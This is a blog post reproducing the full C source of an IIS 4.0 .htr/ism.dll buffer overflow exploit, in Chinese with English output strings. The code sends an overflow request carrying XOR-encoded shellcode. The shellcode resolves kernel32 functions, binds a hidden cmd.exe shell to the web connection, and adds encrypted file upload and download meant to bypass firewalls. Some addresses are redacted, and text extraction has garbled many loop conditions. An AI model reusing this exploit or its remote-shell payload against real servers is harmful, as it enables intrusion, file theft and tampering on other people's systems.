windows下强大功能的溢出程序源代码

/*----------------------------------------------------------*/ /*   IIS4.0的.htr映射ism.dll溢出攻击程序                    */ /*   编写:yuange(yuange@nsfocus.com)                       */ /*   本程序实现所有语言版本WINDOWS下的溢出攻击。            */ /*   SHELLCODE代码实现绑定cmd.exe功能,实现上传、           */ /*   下传文件的ftp功能,实现加密传输功能,不开              */ /*   端口、不开服务,可以绕过防火墙等。独创的实             */ /*   现源代码编写shellcode的办法,可以方便编写、            */ /*   修改、调试shellcode,使得编写强大功能的                */ /*   shellcode成为可能。也解决了溢出攻击的几个根            */ /*   本问题:1、溢出点确定;2、shellcode定位;              */ /*   3、jmp esp功能代码地址确定;4、WINDOWS的API            */ /*   调用地址版本相关问题。另一个版本实现了接管             */ /*   WWW功能,可以实现不修改WEB页面文件的情况下替           */ /*   换所有WEB页面。                                        */ /*   一般的溢出攻击程序也可以使用这个框架                   */ /*                                                          */ /*   程序在vc6.0下编译通过                                  */ /*----------------------------------------------------------*/ /* iis4。0  overflow program ver 1.0 copy by yuange  2000。05。8 */ #include #include #include #include #define  FNENDLONG   0x08 #define  NOPCODE     'B'    // INC EDX    0x90 #define  NOPLONG     0x50 #define  BUFFSIZE    0x20000 #define  PATHLONG    0x12 // c:\inetpub\wwwroot    物理路径长度。 // 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有 // 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度 #define  RETEIPADDRESS 0xxxxx-PATHLONG+4+4 #define  ADD1          0xxxx-0xxxxx-PATHLONG+4 #define  ADD2      0xxxxx-0xxxxx-PATHLONG+4 /* 由于一些原因,这儿数据不提供  2000.10.25 */ // 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释 #define  SHELLBUFFSIZE 0x800 #define  SHELLFNNUMS   12 #define  DATAXORCODE   0xAA #define  LOCKBIGNUM    19999999 #define  LOCKBIGNUM2   13579139 #define  WEBPORT       80 void     shellcodefnlock(); void     shellcodefn(char *ecb); void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void     iisput(int fd,char *str); void     iisget(int fd,char *str); int      newrecv(int fd,char *buff,int size,int flag); int      newsend(int fd,char *buff,int size,int flag); int      xordatabegin; int      lockintvar1,lockintvar2; char     lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0" "strend"; char buff1[]="GET /""\xff""default.htr/"; char buff2[]=".HTR HTTP/1.1 \nHOST:"; char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char eipexcept1[] ="\xxx\xxx\xxx\xxx"; // char eipexcept[] ="\xxx\xxx\xxx\xxx"; // ret char  eipexcept[]="\xxx\xxx\xxx\xxx"; char  eipwinnt[] ="\xxx\xxx\xxx\xxx"; char  eipwinnt2[]="\xxx\xxx\xxx\xxx"; char  reteax[]   ="\xxx\xxx\xxx\xxx"; /* 由于一些原因,这儿数据不提供  2000.10.25 */ char  eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64"; char    buff[BUFFSIZE]; char    recvbuff[BUFFSIZE]; char    shellcodebuff[0x1000]; struct  sockaddr_in s_in2,s_in3; struct  hostent *he; char    *shellcodefnadd,*chkespadd; unsigned  int sendpacketlong; int       i,j,k; unsigned  char temp; int       fd; u_short   port,port1,shellcodeport; SOCKET    d_ip; WSADATA   wsaData; int       offset=0; int       OVERADD=RETEIPADDRESS; int       result; fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com/ ."); fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]); if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i        if(recvbuff[i]!=' ') break; } server=recvbuff; if(i fprintf(stderr,"\n please enter the offset(0-3):"); gets(buff); for(i=0;i     if(buff[i]!=' ') break; } offset=atoi(buff+i); } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>2){ offset=atoi(argv[2]); } OVERADD+=offset; /* if(offset<0||offset>3){ fprintf(stderr,"\n offset error !offset  0 - 3 ."); gets(buff); exit(1); } */ if(argc <2){ //     WSACleanup( ); //       exit(1); } else  server = argv[1]; for(i=0;i    if(server[i]!=' ') break; } if(i for(i=0;i+3     if(server[i]==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else    memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else   port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)  { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n  connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); if(argc>4){ memcpy(buff,argv[4],strlen(argv[4])); } else  memcpy(buff,buff1,strlen(buff1)); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i    temp=shellcodebuff[i]; temp^=DATAXORCODE; if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){ buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } //  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong); //  k+=sendpacketlong; for(i=-0x30;i<0x30;i+=4){ memcpy(buff+ADD1+offset+i,eipexcept,4); memcpy(buff+ADD2+offset+i,eipexcept,4); } for(i=-0x30;i<0x30;i+=4){ memcpy(buff+OVERADD+i,eipexcept,4); } memcpy(buff+OVERADD+i,eipwinnt2,4); memcpy(buff+OVERADD+i+4,reteax,4); memcpy(buff+OVERADD+i+8,eipwinnt,4); memcpy(buff+OVERADD+i+0x0c,eipwinnt,4); memcpy(buff+OVERADD+i+0x10,eipjmpshell,7); // fprintf(stderr,"\n send:\n %s",buff); fprintf(stderr,"\n offset:%d",offset); /* if(argc>2){ server=argv[2]; if(strcmp(server,"win9x")==0){ memcpy(buff+OVERADD,eipwin9x,4); fprintf(stderr,"\n nuke win9x."); } if(strcmp(server,"winnt")==0){ memcpy(buff+OVERADD,eipwinnt,4); fprintf(stderr,"\n nuke winnt."); } } */ sendpacketlong=k+OVERADD+NOPLONG; strcpy(buff+sendpacketlong,buff2); strcpy(buff+sendpacketlong+strlen(buff2),server); strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n"); // printf("\n send buff:\n%s",buff); //  strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); /* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */ if(argc>6){ if(strcmp(argv[6],"debug")==0){ _asm{ lea esp,buff add esp,OVERADD ret } } } xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; fprintf(stderr,"\n send  packet %d bytes.",j); send(fd,buff,j,0); k=newrecv(fd,recvbuff,0x1000,0); if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) { xordatabegin=1; k=-1; fprintf(stderr,"\n ok!\n"); } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n  recv:\n %s",recvbuff); } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; k=1; while(k!=0){ if(k<0){ i=0; while(i==0){ gets(buff); if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); } else{ if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); } else i=1; } } k=strlen(buff); memcpy(buff+k,SRLF,3); newsend(fd,buff,k+2,0); } k=newrecv(fd,buff,0x1000,0); if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){ xordatabegin=1; k=-1; } if(k>0){ buff[k]=0; fprintf(stderr,"%s",buff); } //   if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void  shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop _emit('?') xor ecx,ecx add si,474h cmp dword ptr [esi],ecx jnz getesi add si,4 getesi:          mov esi,[esi] add si,8 xor ecx,ecx mov byte ptr [esi],cl jmp   next getediadd:      pop   EDI push  EDI pop   ESI push  ebx   //  ecb push  ebx   //  call shellcodefn ret address xor   ecx,ecx looplock:         lodsb cmp  al,cl jz   shell cmp  al,0x30 jz   clean0 sto:              xor  al,DATAXORCODE stosb jmp  looplock clean0:           lodsb sub al,0x40 jmp sto next:             call  getediadd shell:           NOP NOP NOP NOP NOP NOP NOP NOP } } void shellcodefn(char *ecb) { char        Buff[SHELLBUFFSIZE+2]; int         *except[3]; FARPROC     Sleepadd; FARPROC     GetLastErroradd; FARPROC     GetFileSizeadd; FARPROC     CreateFileAadd; FARPROC     WriteFileadd; FARPROC     ReadFileadd; FARPROC     PeekNamedPipeadd; FARPROC     CloseHandleadd; FARPROC     CreateProcessadd; FARPROC     CreatePipeadd; FARPROC    procloadlib; FARPROC     apifnadd[1]; FARPROC     procgetadd=0; FARPROC     writeclient= *(int *)(ecb+0x84); FARPROC     readclient = *(int *)(ecb+0x88); HCONN       ConnID     = *(int *)(ecb+8) ; char        *stradd; int         imgbase,fnbase,i,k,l; HANDLE      libhandle,fpt;   //libwsock32; STARTUPINFO siinfo; PROCESS_INformATION ProcessInformation; HANDLE   hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int         lBytesRead; int  lockintvar1,lockintvar2; char lockcharvar; SECURITY_ATTRIBUTES sa; _asm { jmp    nextcall getstradd:   pop    stradd lea    EDI,except mov    eax,dword ptr FS:[0] mov    dword ptr [edi+0x08],eax mov    dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){ k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } // 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址 // 注意这儿处理了搜索页面不在情况。 _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto  die ; for(k=1;k        apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if(*(stradd)==0&&*(stradd+1)!=0) break; } ++stradd; } sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; // k=0; // while(k==0){ k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); stradd+=8; // } PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); k=8; writeclient(ConnID,stradd+9,&k,0); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0){ ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0){ for(k=0;k                    lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); } } else{ lBytesRead=SHELLBUFFSIZE; l=0; while(l==0){ k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l                        lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){ l=*(int *)(Buff+4); //                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0) ; k=GetLastErroradd(); i=0; while(l>0){ k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k                                         lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; } l-=lBytesRead; WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); } } else{ Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){ fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis';        //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i                               lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } writeclient(ConnID,Buff,&lBytesRead,0); //    Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i                                       lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC); //                                    Sleepadd(100); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe while(1){ Sleepadd(0x7fffffff);                  //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); //             Sleepadd(1000); } } } die: goto die  ; _asm{ getexceptretadd:   pop  eax push eax mov  edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram:       mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344  //stradd-0xe xor eax,eax        //2 ret            //1 execptprogram:     jmp errprogram    //2 bytes stradd-7 nextcall:          call getstradd    //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i      temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43;   // inc ebx shellbuff[i+2]=0x4b;    // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } void iisput(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i    if(*str!=' '){ filename=str; break; } } for(;i     if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i      if(*str!=' '){ filename2=str; break; } } for(;i     if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh); strcpy(buff,"put "); *(int *)(buff+4)=filesize; filesize=*(int *)(buff+4); strcpy(buff+0x8,filename2); newsend(fd,buff,i+0x9,0); printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize); Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ newsend(fd,buff,size,0); //          Sleep(0100); filesize-=size; } } CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i    if(*str!=' '){ filename=str; break; } } for(;i     if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i     if(*str!=' '){ filename2=str; break; } } for(;i    if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get "); strcpy(buff+0x4,filename2); newsend(fd,buff,i+0x5,0); printf("\n get file:%s from file:%s",filename,filename2); j=0; ioctlsocket(fd, FIONBIO, &j); i=0; filesize=0; j=0; while(j<100){ //  Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { j=0; printf("\n recv %s",buff); } } else ++j; // if(j>1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; WriteFile(fpt,buff+8,i,&i,NULL); filesize-=i; } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ WriteFile(fpt,buff,size,&size,NULL); filesize-=size; } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } int newrecv(int fd,char *buff,int size,int flag) { int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i               lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; } } return(k); } int newsend(int fd,char *buff,int size,int flag) { int i; for(i=0;i               lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; } return(send(fd,buff,size,flag)); }
posted @ 2012-07-15 23:12  adodo1  Views(104)  Comments(0Edit  收藏  举报